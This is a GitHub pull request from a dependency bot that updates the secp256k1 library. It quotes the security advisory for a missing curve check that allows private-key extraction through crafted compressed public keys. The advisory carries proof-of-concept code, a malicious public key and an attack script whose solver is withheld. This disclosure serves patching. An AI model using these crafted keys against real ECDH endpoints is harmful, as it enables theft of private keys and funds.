Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

chore(deps): update dependency secp256k1 [security] #8162

Open
wants to merge 1 commit into
base: develop
Choose a base branch
from

Conversation

live-github-bot[bot]
Copy link
Contributor

@live-github-bot live-github-bot bot commented Oct 21, 2024

This PR contains the following updates:

Package Type Update Change
secp256k1 devDependencies patch 5.0.0 -> 5.0.1
secp256k1 dependencies patch 5.0.0 -> 5.0.1
secp256k1 dependencies patch 4.0.3 -> 4.0.4

GitHub Vulnerability Alerts

CVE-2024-48930

Summary

In elliptic-based version, loadUncompressedPublicKey has a check that the public key is on the curve: https://github.com/cryptocoinjs/secp256k1-node/blob/6d3474b81d073cc9c8cc8cfadb580c84f8df5248/lib/elliptic.js#L37-L39

loadCompressedPublicKey is, however, missing that check: https://github.com/cryptocoinjs/secp256k1-node/blob/6d3474b81d073cc9c8cc8cfadb580c84f8df5248/lib/elliptic.js#L17-L19

That allows the attacker to use public keys on low-cardinality curves to extract enough information to fully restore the private key from as little as 11 ECDH sessions, and very cheaply on compute power

Other operations on public keys are also affected, including e.g. publicKeyVerify() incorrectly returning true on those invalid keys, and e.g. publicKeyTweakMul() also returning predictable outcomes allowing to restore the tweak

Details

The curve equation is Y^2 = X^3 + 7, and it restores Y from X in loadCompressedPublicKey, using Y = sqrt(X^3 + 7), but when there are no valid Y values satisfying Y^2 = X^3 + 7 for a given X, the same code calculates a solution for -Y^2 = X^3 + 7, and that solution also satisfies some other equation Y^2 = X^3 + D, where D is not equal to 7 and might be on a curve with factorizable cardinality, so (X,Y) might be a low-order point on that curve, lowering the number of possible ECDH output values to bruteforcable

Those output values correspond to remainders which can be then combined with Chinese remainder theorem to restore the original value

Endomorphism-based multiplication only slightly hinders restoration and does not affect the fact that the result is low-order

10 different malicious X values could be chosen so that the overall extracted information is 238.4 bits out of 256 bit private key, and the rest is trivially bruteforcable with an additional 11th public key (which might be valid or not -- not significant)

The attacker does not need to receive the ECDH value, they only need to be able to confirm it against a list of possible candidates, e.g. check if using it to decipher block/stream cipher would work -- and that could all be done locally on the attacker side

PoC

Example public key

This key has order 39
One of the possible outcomes for it is a throw, 38 are predictable ECDH values
Keys used in full attack have higher order (starting from ~20000), so are very unlikely to cause an error

import secp256k1 from 'secp256k1/elliptic.js'
import { randomBytes } from 'crypto'

const pub = Buffer.from('028ac57f9c6399282773c116ef21f7394890b6140aa6f25c181e9a91e2a9e3da45', 'hex')

const seen = new Set()
for (let i = 0; i < 1000; i++) {
  try {
    seen.add(Buffer.from(secp256k1.ecdh(pub, randomBytes(32))).toString('hex'))
  } catch {
    seen.add('failure also is an outcome')
  }
}

console.log(seen.size) // 39

Full attack

This PoC doesn't list the exact public keys or the code for solver.js intentionally, but this exact code works, on arbitrary random private keys:

// Only the elliptic version is affected, gyp one isn't
// Node.js can use both, Web/RN/bundles always use the elliptic version
import secp256k1 from 'secp256k1/elliptic.js'

import { randomBytes } from 'node:crypto'
import assert from 'node:assert/strict'
import { Solver } from './solver.js'

const privateKey = randomBytes(32)

// The full dataset is precomputed on a single MacBook Air in a few days and can be reused for any private key
const solver = new Solver

// We need to run on 10 specially crafted public keys for this
// Lower than 10 is possible but requires more compute
for (let i = 0; i < 10; i++) {
  const letMeIn = solver.ping() // this is a normal 33-byte Uint8Array, a 02/03-prefixed compressed public key
  assert(letMeIn instanceof Uint8Array) // true
  assert(secp256k1.publicKeyVerify(letMeIn)) // true

  // Returning ecdh value is not necessary but is used in this demo for simplicity
  // Solver needs to _confirm_ an ecdh value against a set of precalculated known ones,
  // which can be done even after it's hashed or used e.g. for a stream/block cipher, based on the encrypted data
  solver.callback(secp256k1.ecdh(letMeIn, privateKey))

  // Btw we have those precomputed so we can actually use those sessions to lower suspicion, most -- instantly
}

// Now, we need a single valid (or another invalid) public key to recheck things against
// It can be anything, e.g. we can specify an 11th one, or create a valid one and use it
// We'll be able to confirm/restore and use the ecdh value for this session too upon privateKey extraction
const anyPublicKey = secp256k1.publicKeyCreate(randomBytes(32))
assert(secp256k1.publicKeyVerify(anyPublicKey)) // true (obviously)

// Full complexity of this exploit requires solver to perform ~ 2^35 ecdh value checks (for all 10 keys combined),
// which is ~ 1 TiB -- that can be done offline and does not require any further interaction with the target
// The exact speed of the comparison step depends on how the ecdh values are used, but is not very significant
// Direct non-indexed linear scan over all possible (precomputed) values takes <10 minutes on a MacBook Air
// Confirming against e.g. cipher output would be somewhat slower, but still definitely possible + also could be precomputed
const extracted = solver.stab(anyPublicKey, secp256k1.ecdh(anyPublicKey, privateKey))

console.log(`Extracted private key:  ${extracted.toString('hex')}`)
console.log(`Actual private key was: ${privateKey.toString('hex')}`)

assert(extracted.toString('hex') === privateKey.toString('hex'))

console.log('Oops')

Result:

Extracted private key:  e3370b1e6726a6ceaa51a2aacf419e25244e0cde08596780da021b238b74df3d
Actual private key was: e3370b1e6726a6ceaa51a2aacf419e25244e0cde08596780da021b238b74df3d
Oops
node example.js  178.80s user 13.59s system 74% cpu 4:17.01 total

Impact

Remote private key is extracted over 11 ECDH sessions

The attack is very low-cost, precompute took a few days on a single MacBook Air, and extraction takes ~10 minutes on the same MacBook Air

Also:

  • publicKeyVerify() misreports malicious public keys as valid
  • Same affects tweak extraction from publicKeyTweakMul result and other public key operations

Release Notes

cryptocoinjs/secp256k1-node (secp256k1)

v5.0.1

Compare Source


Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Paris, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

👻 Immortal: This PR will be recreated if closed unmerged. Get config help if that's undesired.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.

@live-github-bot live-github-bot bot requested a review from a team as a code owner October 21, 2024 22:06
Copy link

vercel bot commented Oct 21, 2024

The latest updates on your projects. Learn more about Vercel for Git ↗︎

5 Skipped Deployments
Name Status Preview Comments Updated (UTC)
ledger-live-docs ⬜️ Ignored (Inspect) Visit Preview Dec 13, 2024 11:08pm
ledger-live-github-bot ⬜️ Ignored (Inspect) Visit Preview Dec 13, 2024 11:08pm
native-ui-storybook ⬜️ Ignored (Inspect) Visit Preview Dec 13, 2024 11:08pm
react-ui-storybook ⬜️ Ignored (Inspect) Visit Preview Dec 13, 2024 11:08pm
web-tools ⬜️ Ignored (Inspect) Visit Preview Dec 13, 2024 11:08pm

@live-github-bot live-github-bot bot added the ledgerjs Has changes in the ledgerjs open source libs label Oct 21, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from 6305d0f to efa0d25 Compare October 21, 2024 22:15
@live-github-bot live-github-bot bot removed the ledgerjs Has changes in the ledgerjs open source libs label Oct 21, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from efa0d25 to ddd00a1 Compare October 21, 2024 22:26
@live-github-bot live-github-bot bot added the ledgerjs Has changes in the ledgerjs open source libs label Oct 21, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from ddd00a1 to f9a2684 Compare October 21, 2024 22:35
@live-github-bot live-github-bot bot removed the ledgerjs Has changes in the ledgerjs open source libs label Oct 21, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from f9a2684 to 6f2fc01 Compare October 21, 2024 22:44
@live-github-bot live-github-bot bot added the ledgerjs Has changes in the ledgerjs open source libs label Oct 21, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from 6f2fc01 to dd14cd2 Compare October 21, 2024 22:50
@live-github-bot live-github-bot bot removed the ledgerjs Has changes in the ledgerjs open source libs label Oct 21, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from dd14cd2 to 51c3066 Compare October 21, 2024 22:57
@live-github-bot live-github-bot bot added the ledgerjs Has changes in the ledgerjs open source libs label Oct 21, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from 51c3066 to 4811d61 Compare October 21, 2024 23:03
@live-github-bot live-github-bot bot removed the ledgerjs Has changes in the ledgerjs open source libs label Oct 21, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from 4811d61 to d134279 Compare October 22, 2024 22:06
@live-github-bot live-github-bot bot changed the title chore(deps): update dependency secp256k1 [security] chore(deps): update dependency secp256k1 to v5.0.1 [security] Oct 22, 2024
@live-github-bot live-github-bot bot added the ledgerjs Has changes in the ledgerjs open source libs label Oct 22, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from d134279 to 0e7e537 Compare October 22, 2024 22:15
@live-github-bot live-github-bot bot removed the ledgerjs Has changes in the ledgerjs open source libs label Oct 22, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from 0e7e537 to e5a44de Compare October 22, 2024 22:27
@live-github-bot live-github-bot bot added the ledgerjs Has changes in the ledgerjs open source libs label Oct 22, 2024
@live-github-bot live-github-bot bot removed the ledgerjs Has changes in the ledgerjs open source libs label Dec 12, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from 5360fda to 948a5ca Compare December 13, 2024 22:05
@live-github-bot live-github-bot bot added desktop Has changes in LLD ledgerjs Has changes in the ledgerjs open source libs labels Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from 948a5ca to b20034f Compare December 13, 2024 22:14
@live-github-bot live-github-bot bot removed desktop Has changes in LLD ledgerjs Has changes in the ledgerjs open source libs labels Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from b20034f to d0c1f51 Compare December 13, 2024 22:27
@live-github-bot live-github-bot bot added desktop Has changes in LLD ledgerjs Has changes in the ledgerjs open source libs labels Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from d0c1f51 to f92bda4 Compare December 13, 2024 22:37
@live-github-bot live-github-bot bot removed desktop Has changes in LLD ledgerjs Has changes in the ledgerjs open source libs labels Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from f92bda4 to dad1fa4 Compare December 13, 2024 22:46
@live-github-bot live-github-bot bot added desktop Has changes in LLD ledgerjs Has changes in the ledgerjs open source libs labels Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from dad1fa4 to 00c4bfc Compare December 13, 2024 22:52
@live-github-bot live-github-bot bot removed desktop Has changes in LLD ledgerjs Has changes in the ledgerjs open source libs labels Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from 00c4bfc to 143e2a2 Compare December 13, 2024 22:59
@live-github-bot live-github-bot bot added desktop Has changes in LLD ledgerjs Has changes in the ledgerjs open source libs labels Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-secp256k1-vulnerability branch from 143e2a2 to d909157 Compare December 13, 2024 23:08
@live-github-bot live-github-bot bot removed desktop Has changes in LLD ledgerjs Has changes in the ledgerjs open source libs labels Dec 13, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging this pull request may close these issues.

0 participants